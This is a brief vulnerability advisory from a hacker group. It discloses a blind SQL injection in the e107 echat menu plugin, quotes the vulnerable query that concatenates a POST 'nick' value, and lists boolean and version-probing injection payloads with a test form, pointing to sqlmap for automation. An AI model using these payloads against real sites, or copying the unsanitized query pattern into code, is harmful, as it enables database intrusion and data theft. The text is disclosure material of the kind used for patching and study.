################################################################################################## # # # ::e107 Plugin echat MENU Blind SQL Injection Vulnerability:: # # # ################################################################################################## Virangar Security Team www.virangar.net www.virangar.ir -------- Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) -------vuln codes in:----------- e107chat.php: line 109: $nick = $_POST['nick']; .. .. line 171:db_Select("user","user_name","user_name='".$nick."'"); --- exploit: [-]note=becuse e107 using diffrent prefix/table names it's impossible to writting exploit for it :( --- lets test the bug white a simply html form that post data to "e107chat.php" : ------- <form method="post" action="http://localhost/e107/plugins/echat_menu/e107chat.php"><br> nick:<input type="text" name="nick" size="20"> <br><input type="submit"><br> </form> --- see the result: nick: hadi and 1=1-- #page loaded whit any errors. nick: hadi and 1=2-- #page loaded whit any data and some error cheking the mysql version: nick: hadi and substring(@@version,1,1)=5-- or nick: hadi and substring(@@version,1,1)=4-- # you can exploting the bug white blind sql automatic toolz such as sqlmap or ... --- young iranian h4ck3rz